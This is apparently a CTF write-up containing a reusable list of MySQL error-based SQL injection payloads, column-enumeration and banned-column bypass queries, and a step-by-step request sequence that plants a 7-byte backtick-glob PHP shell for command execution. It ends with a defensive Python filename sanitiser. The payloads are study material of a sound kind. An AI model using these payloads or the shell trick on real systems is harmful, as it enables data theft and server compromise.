I feel I am getting worse and worse, and I have hit a bottleneck: playing simple, low-quality competitions does not yield much, while the high-quality ones I cannot make progress on. Still, I need to keep studying, and reproducing the challenges after a competition ends has taught me a great deal.

What secret do "they" have?

First, a set of error-based injection statements I have collected:

1. Error via floor(); the injection statement is:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

2. Error via ExtractValue(); the injection statement is:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3. Error via UpdateXml(); the injection statement is:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

4. Error via NAME_CONST(); the injection statement is:
and exists(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

5. Error via join; the injection statement is:
select * from(select * from mysql.user a join mysql.user b)c;

6. Error via exp(); the injection statement is:
and exp(~(select * from (select user())a));

7. Error via GeometryCollection(); the injection statement is:
and GeometryCollection((select * from(select user())a)b);

8. Error via polygon(); the injection statement is:
and polygon((select * from(select user())a)b);

9. Error via multipoint(); the injection statement is:
and multipoint((select * from(select user())a)b);

10. Error via multilinestring(); the injection statement is:
and multilinestring((select * from(select user())a)b);

11. Error via multipolygon(); the injection statement is:
and multipolygon((select * from(select user())a)b);

12. Error via linestring(); the injection statement is:
and linestring((select * from(select user())a)b);

Database name: youcanneverfindme1
Table name: product_2017ctf
Partial column name: pro_id

The usage of using in MySQL:
using() is used in a join query between two tables. It requires that the columns named in using() exist in both tables, and it uses them as the join condition.

The two tables are connected through join.

mysql> select * from users as a join users as b using(id);
+----+----------+-------------+----------+-------------+
| id | username | password | username | password |
+----+----------+-------------+----------+-------------+
| 1 | Dumb | admin | Dumb | admin |
| 2 | Angelina | admin | Angelina | admin |
| 3 | Dummy | admin | Dummy | admin |
| 4 | secure | admin | secure | admin |
| 5 | stupid | admin | stupid | admin |
| 6 | superman | admin | superman | admin |
| 7 | batman | admin | batman | admin |
| 8 | admin | admin?????? | admin | admin?????? |
| 9 | admin1 | admin | admin1 | admin |
| 10 | admin2 | admin | admin2 | admin |
| 11 | admin3 | admin | admin3 | admin |
| 12 | dhakkan | admin | dhakkan | admin |
| 14 | admin4 | admin | admin4 | admin |
+----+----------+-------------+----------+-------------+
pro_id=-2 and (select * from (select * from product_2017ctf as a join product_2017ctf as b using(pro_id))as c)

Duplicate column name 'pro_name'

pro_id=-2 and (select * from (select * from product_2017ctf as a join product_2017ctf as b using(pro_id,pro_name))as c)

Duplicate column name 'owner'

pro_id=-2 and (select * from (select * from product_2017ctf as a join product_2017ctf as b using(pro_id,pro_name,owner))as c)

Duplicate column name 'd067a0fa9dc61a6e'

But the column d067a0fa9dc61a6e is banned.
Injection without column names

pro_id=-2  union select 1,d,3,d from (select 1 a,2 b,3 c,4 d from product_2017ctf union select * from product_2017ctf limit 3,1)e

Because the banned column cannot be named, the first SELECT inside the derived table gives the four positional columns the aliases a, b, c and d, so the fourth column of product_2017ctf is then referenced as d in the outer query.

product name:7195ca99696b5a896.php

Visiting it shows that files can be written, but the content is limited to 7 bytes. http://www.vuln.cn/6016

<?php
// Per-client directory derived from the remote address and User-Agent
$savepath = "files/".sha1($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT'])."/";
if (!is_dir($savepath)) {
    $oldmask = umask(0);
    mkdir($savepath, 0777);
    umask($oldmask);
    touch($savepath."/index.html");
}
if ((@$_POST['filename']) && (@$_POST['content'])) {
    // The filename is taken verbatim from the request; the content is truncated to 7 bytes
    $fp = fopen("$savepath".$_POST['filename'], 'w');
    fwrite($fp, substr($_POST['content'], 0, 7));
    fclose($fp);
    $msg = 'File saved to <a>'.$savepath.htmlspecialchars($_POST['filename'])."</a>";
}
?>

POST the following three requests, in order:

filename=p.php&content=<?=`*`;
filename=bash&content=xxx
filename=bash2&content=ls /

Then visit p.php and you will see:

327a6c4304ad5938eaf0efb6cc3e53dc.php

POST again:
filename=bash2&content=cat /3*
Visit p.php again, right-click to view the page source, and the flag is there.
The process in detail:
In p.php's `<?=`*`;`, the `*` is expanded to the files in the current directory, sorted alphabetically,
which is roughly equivalent to:

<?php echo `bash bash2 index.html p.php` ?>

When p.php is visited, bash executes the commands in the file bash2, and the files after it are ignored.
By changing the contents of bash2 you can therefore construct command execution.
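The save handler above trusts the client-supplied filename and writes into a directory the web server both serves and executes, which is what makes the glob expansion trick work. As an added example (not the challenge's code, and not a patch for it), here is a Python version of the same save step with the checks a defender would put in: an allowlist on the name, a real-path check that the target stays inside the upload directory, and the assumption that the directory lives outside the web root so nothing written there is ever interpreted. The allowlist regex, the function names and the rejected test names are this example's own.

```python
import os
import re
import tempfile

# Allowlist for user-supplied names: letters, digits, '_' and '-', then exactly one
# extension the application serves as plain data. Leading dots, spaces, path
# separators and executable extensions never match. (Regex is this example's own.)
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(txt|log)")


def safe_save(base_dir, filename, content, max_bytes=7):
    """Write content (truncated to max_bytes, as in the challenge) under base_dir.

    Returns the absolute path written, or raises ValueError for a rejected name.
    base_dir is assumed to be outside the web root, so a saved file is never
    executed by the server even if another check is bypassed.
    """
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected filename: {filename!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    # Defence in depth: even an allowlisted name must resolve inside base_dir.
    if os.path.dirname(target) != base:
        raise ValueError("path escapes upload directory")
    data = content if isinstance(content, bytes) else content.encode("utf-8")
    with open(target, "wb") as fp:
        fp.write(data[:max_bytes])
    return target


def demo():
    """Exercise safe_save in a fresh temporary directory and return the outcomes."""
    base = tempfile.mkdtemp(prefix="uploads_")
    results = {}
    saved = safe_save(base, "notes.txt", "hello world")
    results["ok"] = os.path.basename(saved)
    with open(saved, "rb") as fp:
        results["saved_bytes"] = fp.read()
    # Names from the request sequence above plus traversal/dotfile variants.
    for name in ("p.php", "bash", "bash2", "../etc.txt", ".htaccess", "a b.txt", "x.txt.php"):
        try:
            safe_save(base, name, "x")
            results[name] = "accepted"
        except ValueError:
            results[name] = "rejected"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name!r}: {outcome!r}")
```

Rejecting the names p.php, bash and bash2 removes every file the glob expansion depended on, and keeping the upload directory out of the document root means that even an accepted file is only ever read back as data.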